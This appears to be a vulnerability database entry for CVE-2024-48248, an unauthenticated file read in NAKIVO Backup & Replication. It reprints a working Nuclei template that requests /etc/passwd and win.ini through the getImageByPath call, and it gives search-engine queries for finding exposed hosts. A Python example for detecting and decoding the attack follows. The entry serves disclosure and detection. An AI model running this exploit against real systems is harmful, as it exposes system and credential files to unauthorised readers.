CVE-2024-48248: NAKIVO Backup and Replication Solution - Unauthenticated Arbitrary File Read

Date: 2025-08-01 | Affected software: NAKIVO Backup and Replication Solution | PoC: public

Vulnerability description

NAKIVO Backup & Replication is a data protection solution used for backing up and restoring virtualized and physical environments. A vulnerability has been identified in certain versions of NAKIVO Backup & Replication that allows an unauthenticated attacker to read arbitrary files on the underlying system.

PoC code [public]

id: CVE-2024-48248

info:
  name: NAKIVO Backup and Replication Solution - Unauthenticated Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    NAKIVO Backup & Replication is a data protection solution used for backing up and restoring virtualized and physical environments. A vulnerability has been identified in certain versions of NAKIVO Backup & Replication that allows an unauthenticated attacker to read arbitrary files on the underlying system.
  reference:
    - https://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248/
  classification:
    epss-score: 0.93989
    epss-percentile: 0.99882
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"NAKIVO"
    fofa-query: title="NAKIVO"
  tags: cve,cve2024,nakivo,backup,lfi,kev,vkev

variables:
  string: "{{to_lower(rand_base(5))}}"

http:
  - raw:
      - |
        POST /c/router HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: keep-alive
        Content-Type: application/json

        {"action": "STPreLoadManagement", "data": ["{{path}}"], "method": "getImageByPath", "sid": "", "tid": "{{string}}", "type": "{{string}}"}

    payloads:
      path:
        - /etc/passwd
        - C:/windows/win.ini

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        name: linux
        dsl:
          - "regex('114,111,111,116,58,.*,58,48,58,48,58', body)"
          - "contains(body, 'STPreLoadManagement')"
          - "status_code == 200"
        condition: and

      - type: dsl
        name: windows
        dsl:
          - "contains(body, '59,32,102,111,114')"
          - "contains(body, 'STPreLoadManagement')"
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502202012485f7ca5a4326745669950355b16b563fa59233d9bea5d10a19821d68d5c022100ded7e6ee1f5d926efbb1c7d82c1040d9291302eae1abe49ab3216dadd5385332:922c64590222798bb761d5b6d8e72950
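To show what the two matchers above are keying on, here is an added Python example (not part of the template or the watchTowr write-up): it decodes the comma-separated decimal byte array that the endpoint returns and flags the request shape a defender would look for in proxy or application logs. The sample request and response are constructed, not captured traffic.

```python
import json
import re

# Constructed request body in the shape of the template's POST /c/router payload (placeholder path)
SAMPLE_REQUEST = ('{"action": "STPreLoadManagement", "data": ["/etc/passwd"], '
                  '"method": "getImageByPath", "sid": "", "tid": "abcde", "type": "abcde"}')

# The matchers' decimal sequences, decoded: "root:" ... ":0:0:" and "; for"
PASSWD_SIGNATURE = re.compile(rb"^root:.*:0:0:", re.M)  # 114,111,111,116,58 ... 58,48,58,48,58
WIN_INI_SIGNATURE = b"; for"                             # 59,32,102,111,114


def encode_as_byte_array(data: bytes) -> str:
    """Render bytes the way the endpoint does: comma-separated decimal values."""
    return ",".join(str(b) for b in data)


# Constructed response fragment carrying one /etc/passwd line in that encoding
SAMPLE_RESPONSE = ('[{"action":"STPreLoadManagement","method":"getImageByPath","result":['
                   + encode_as_byte_array(b"root:x:0:0:root:/root:/bin/bash\n") + ']}]')


def is_exploit_attempt(body: str) -> bool:
    """Flag a /c/router request calling getImageByPath on STPreLoadManagement (CVE-2024-48248)."""
    try:
        req = json.loads(body)
    except ValueError:
        return False
    return (isinstance(req, dict)
            and req.get("action") == "STPreLoadManagement"
            and req.get("method") == "getImageByPath")


def decode_byte_array(body: str) -> bytes:
    """Recover file content from the longest comma-separated decimal run
    (at least five values, each 0-255) found in a response body."""
    runs = re.findall(r"(?:\d{1,3},){4,}\d{1,3}", body)
    for run in sorted(runs, key=len, reverse=True):
        values = [int(v) for v in run.split(",")]
        if all(v <= 255 for v in values):
            return bytes(values)
    return b""


def leaked_file_kind(body: str) -> str:
    """Classify a decoded response the way the template's two matchers do; "" if neither fires."""
    data = decode_byte_array(body)
    if PASSWD_SIGNATURE.search(data):
        return "linux-passwd"
    if WIN_INI_SIGNATURE in data:
        return "windows-win-ini"
    return ""
```

The request check is the part worth wiring into a WAF rule or log query; the decoder is there to confirm what a suspicious response actually contained during incident review.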